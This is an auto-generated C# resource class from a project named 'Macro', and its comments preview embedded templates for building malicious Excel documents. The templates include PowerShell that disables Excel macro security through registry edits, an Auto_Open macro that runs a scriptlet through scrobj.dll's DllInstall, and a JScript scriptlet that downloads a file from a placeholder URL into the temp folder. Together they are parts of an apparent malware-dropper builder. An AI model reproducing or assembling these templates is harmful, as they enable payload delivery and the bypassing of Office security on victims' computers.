//------------------------------------------------------------------------------
// <auto-generated>
//     此代码由工具生成。
//     运行时版本:4.0.30319.42000
//
//     对此文件的更改可能会导致不正确的行为，并且如果
//     重新生成代码，这些更改将会丢失。
// </auto-generated>
//------------------------------------------------------------------------------

namespace Macro.Properties {
    using System;
    
    
    /// <summary>
    ///   一个强类型的资源类，用于查找本地化的字符串等。
    /// </summary>
    // 此类是由 StronglyTypedResourceBuilder
    // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。
    // 若要添加或移除成员，请编辑 .ResX 文件，然后重新运行 ResGen
    // (以 /str 作为命令选项)，或重新生成 VS 项目。
    [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
    [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]
    [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
    internal class Resources {
        
        private static global::System.Resources.ResourceManager resourceMan;
        
        private static global::System.Globalization.CultureInfo resourceCulture;
        
        [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")]
        internal Resources() {
        }
        
        /// <summary>
        ///   返回此类使用的缓存的 ResourceManager 实例。
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Resources.ResourceManager ResourceManager {
            get {
                if (object.ReferenceEquals(resourceMan, null)) {
                    global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Macro.Properties.Resources", typeof(Resources).Assembly);
                    resourceMan = temp;
                }
                return resourceMan;
            }
        }
        
        /// <summary>
        ///   重写当前线程的 CurrentUICulture 属性，对
        ///   使用此强类型资源类的所有资源查找执行重写。
        /// </summary>
        [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]
        internal static global::System.Globalization.CultureInfo Culture {
            get {
                return resourceCulture;
            }
            set {
                resourceCulture = value;
            }
        }
        
        /// <summary>
        ///   查找类似 $global:FullName = &quot;$env:userprofile\Desktop\&quot;+ &quot;qwqdanchun.xls&quot;
        ///
        ///$Code = @&quot;
        ///Private Declare Function DllInstall Lib &quot;scrobj.dll&quot; (ByVal bInstall As Boolean, ByRef pszCmdLine As Any) As Long
        ///
        ///Sub Auto_Open()
        ///    DllInstall False, ByVal StrPtr(&quot; 的本地化字符串。
        /// </summary>
        internal static string builder1 {
            get {
                return ResourceManager.GetString("builder1", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 &quot;) &apos; False = &quot;Don&apos;t install&quot;
        ///End Sub
        ///&quot;@
        ///
        ///#Create excel document
        ///$Excel01 = New-Object -ComObject &quot;Excel.Application&quot;
        ///$ExcelVersion = $Excel01.Version
        ///
        ///#Disable Macro Security
        ///New-ItemProperty -Path &quot;HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security&quot; -Name AccessVBOM -PropertyType DWORD -Value 1 -Force | Out-Null
        ///New-ItemProperty -Path &quot;HKCU:\Software\Microsoft\Office\$ExcelVersion\Excel\Security&quot; -Name VBAWarnings -PropertyType DWORD -Value 1 -Force | Out-Null
        ///
        ///$Excel01.DisplayAlerts  [字符串的其余部分被截断]&quot;; 的本地化字符串。
        /// </summary>
        internal static string builder2 {
            get {
                return ResourceManager.GetString("builder2", resourceCulture);
            }
        }
        
        /// <summary>
        ///   查找类似 &lt;?XML version=&quot;1.0&quot;?&gt;
        ///&lt;scriptlet&gt;
        ///&lt;registration
        ///  progid=&quot;TESTING&quot;
        ///  classid=&quot;{A1112221-0000-0000-3000-000DA00DABFC}&quot; &gt;
        ///  &lt;script language=&quot;JScript&quot;&gt;
        ///    &lt;![CDATA[
        ///	var WSHShell = new ActiveXObject(&quot;WScript.Shell&quot;);
        ///path = WSHShell.ExpandEnvironmentStrings(&quot;%temp%&quot;);
        ///var filepath = path+&quot;/qwqdanchun&quot;;
        ///var xhr = new ActiveXObject(&quot;MSXML2.XMLHTTP&quot;);
        ///xhr.open(&quot;GET&quot;,&quot;%qwqdanchun%&quot;, false);
        ///xhr.send();
        ///if (xhr.Status == 200) {
        ///    var fso = new ActiveXObject(&quot;Scripting.FileSystemObject&quot;);
        ///    var  [字符串的其余部分被截断]&quot;; 的本地化字符串。
        /// </summary>
        internal static string sct {
            get {
                return ResourceManager.GetString("sct", resourceCulture);
            }
        }
    }
}
